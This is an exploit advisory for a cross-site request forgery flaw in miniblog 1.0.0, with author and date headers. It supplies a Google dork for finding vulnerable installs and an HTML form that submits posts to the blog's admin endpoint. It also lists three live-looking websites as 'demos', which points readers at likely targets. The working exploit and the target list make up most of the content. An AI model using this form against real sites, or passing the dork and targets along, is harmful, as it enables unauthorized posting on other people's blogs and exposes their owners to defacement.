facebook facebook twitter rss

miniblog 1.0.0 CSRF add post

Author: Mustafa Moshkela , Published: 01-05-2015
#########################################

[+] Author: Mustafa Moshkela



[+] Exploit Title: miniblog add post



[+] Date: 25-4-2015



[+] Category: WebApp



[+] Vendor: http://www.spyka.net/scripts/php/miniblog



[+] Google Dork: Powered by miniblog 1.0.0.



[+] Tested on: Windows 8



#########################################

exploit:


<form action="http://example.com/adm/admin.php?mode=add" method="post">
<p>
<label for="title">Post title:</label>
<input type="text" size="80" id="title" name="data[post_title]" value="" />
</p>

<p>
<label for="content">Post content:</label>
<textarea cols="77" rows="10" id="content" name="data[post_content]"></textarea>
<span class="form-text">To format just use raw HTML.. &lt;strong&gt;, &lt;span&gt;, etc</span>
</p>
<p>
<label for="status">Post status:</label>
<select id="status" name="data[published]">
<option value="1">Published</option>
</select>
<p>
<input class="button" type="submit" name="miniblog_PostBack" value="Add" />
</p>
</p>
Coded By Mustafa Moshkela<br><br>
iq-team.org
</p>
</div>



demos:

http://www.mailprep.com/
http://blumen-schober.de/miniblog/
http://willanhouse.com/

Greets to: all members in iq-team.org

#########################################

Like us on Facebook :